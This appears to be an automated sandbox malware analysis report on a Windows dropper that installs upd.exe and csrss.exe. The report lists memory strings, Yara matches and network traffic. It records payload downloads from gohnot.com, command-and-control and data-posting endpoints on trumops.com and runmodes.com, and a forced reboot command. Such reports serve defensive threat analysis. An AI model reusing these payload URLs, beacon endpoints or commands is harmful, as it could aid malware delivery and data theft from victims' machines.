Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:14:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=cnlc3ums43ob7amk913qjg230o; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K8%2BWwHFzEcC65SRlptMAbLk1ZeMBaUi3xsBQMNzzlQjB5u4QmzHcBSCpMW4bK08piNRaXwWPyWEKl2fynOjutLpjH0glYZ3e22rPHrf252BU1FX1nS%2Bm8MaGSw3sfE8O7dW6RE8S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc28c88274a67-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001F.00000003.417671941.000002A19899D000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-10-29T13:27:37.0950019Z||.||b9c681af-ac5a-4a25-a010-7b8f06b1a611||1152921505694056387||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: upd.exe, csrss.exe String found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
Source: upd.exe, csrss.exe String found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
Source: upd.exe, csrss.exe String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: upd.exe, csrss.exe String found in binary or memory: http://builtwith.com/biup)
Source: upd.exe.0.dr String found in binary or memory: http://crl.g
Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: upd.exe, csrss.exe String found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
Source: csrss.exe, 0000000B.00000002.568303341.00000000119AA000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882
Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exe
Source: csrss.exe, 0000000B.00000003.410949738.0000000011936000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.410362846.00000000119AE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412650413.0000000011864000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exe
Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882:s
Source: upd.exe, csrss.exe String found in binary or memory: http://grub.org)Mozilla/5.0
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: http://help.disneyplus.com.
Source: upd.exe, csrss.exe String found in binary or memory: http://help.ya
Source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
Source: upd.exe, csrss.exe String found in binary or memory: http://misc.yahoo.com.cn/he
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://newscommer.com/app/app.exe
Source: svchost.exe, 0000000A.00000002.352136565.000001E387E7D000.00000004.00000001.sdmp String found in binary or memory: http://schemas.microsoft
Source: upd.exe, csrss.exe String found in binary or memory: http://search.msn.com/msnb
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: upd.exe, csrss.exe String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: upd.exe, csrss.exe String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: upd.exe, csrss.exe String found in binary or memory: http://www.baidu.com/search/spide
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: upd.exe, csrss.exe String found in binary or memory: http://www.bloglines.com)F
Source: upd.exe, csrss.exe String found in binary or memory: http://www.everyfeed.c
Source: upd.exe, csrss.exe String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: upd.exe, csrss.exe String found in binary or memory: http://www.google.com/adsbot.html)Encountered
Source: csrss.exe String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: upd.exe, csrss.exe String found in binary or memory: http://www.google.com/bot.html)tls:
Source: upd.exe, csrss.exe String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: upd.exe, csrss.exe String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: upd.exe, csrss.exe String found in binary or memory: http://www.spidersoft.com)Wget/1.9
Source: upd.exe, csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: upd.exe, csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.80
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://blockchain.infoindex
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: https://disneyplus.com/legal.
Source: upd.exe, csrss.exe String found in binary or memory: https://humisnee.com/sbmstart.phpindefinite
Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.com
Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server2.trumops.com
Source: upd.exe, csrss.exe String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp, upd.exe, 00000008.00000002.351385142.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp String found in binary or memory: https://retoti.com
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://retoti.comidentifier
Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: https://runmodes.com/api/log
Source: csrss.exe, 0000000B.00000003.411869472.00000000118D6000.00000004.00000001.sdmp String found in binary or memory: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A
Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://runmodes.com/api/loginvalid
Source: 0NlSa5bf55.exe, 00000000.00000003.302106289.00000000114E2000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000003.301759199.00000000115C2000.00000004.00000001.sdmp String found in binary or memory: https://server16.trumops.com
Source: 0NlSa5bf55.exe, 00000000.00000003.302123774.00000000114D6000.00000004.00000001.sdmp String found in binary or memory: https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid=
Source: 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp String found in binary or memory: https://server16.trumops.comc=dfd675dbadcd07bb&kind=main&server16.trumops.com:443server16.trumops.co
Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: https://server2.trumops.com
Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e
Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/poll
Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/pollE
Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/pollserver2.trumops.com
Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comc=fa2e76e6e1aa03da&uuid=server2.trumops.com:443server2.trumops.com:443tcp
Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comhttps://server2.trumops.comserver2.trumops.com:443ultserver2.trumops.com:
Source: csrss.exe, 0000000B.00000003.410492385.00000000119AC000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.com
Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.coma
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://sitescore.aiValue
Source: csrss.exe, 0000000B.00000002.567045543.0000000011846000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: https://trumops.com
Source: upd.exe, csrss.exe String found in binary or memory: https://trumops.com/api/install-failureinvalid
Source: upd.exe, 00000005.00000002.323457865.00000000118AE000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
Source: upd.exe, 00000005.00000002.323617755.00000000118CE000.00000004.00000001.sdmp, upd.exe, 00000005.00000002.323544402.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
Source: upd.exe, 00000008.00000002.351356403.000000001180A000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
Source: csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.commusnotifyicon.exeRuntimeBroker.exersionruntimebroker.exeSgrmBro
Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/
Source: svchost.exe, 0000001F.00000003.410443706.000002A1989AE000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown HTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 192Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
Source: unknown DNS traffic detected: queries for: runmodes.com
Source: global traffic HTTP traffic detected: GET /api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= HTTP/1.1Host: server16.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1Host: server2.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/app.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 442b90d2-fde4-485f-a003-6086e2191d6eVersion: 183Accept-Encoding: gzip

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Uses 32bit PE files
Source: 0NlSa5bf55.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 5.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 8.2.upd.exe.9af2e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 8.2.upd.exe.9a76e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 8.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 11.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 11.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 5.2.upd.exe.9af2e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 5.2.upd.exe.9a76e0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 11.2.csrss.exe.9af2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Creates files inside the system directory
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B27F0 36_2_00007FF7019B27F0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D8A4C 36_2_00007FF7019D8A4C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CC25C 36_2_00007FF7019CC25C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B41F0 36_2_00007FF7019B41F0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C7950 36_2_00007FF7019C7950
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019DA174 36_2_00007FF7019DA174
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D74FC 36_2_00007FF7019D74FC
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D03B0 36_2_00007FF7019D03B0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 36_2_00007FF7019D5C10
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B3370 36_2_00007FF7019B3370
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C8549 36_2_00007FF7019C8549
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CD558 36_2_00007FF7019CD558
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019CF908 36_2_00007FF7019CF908
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D48D8 36_2_00007FF7019D48D8
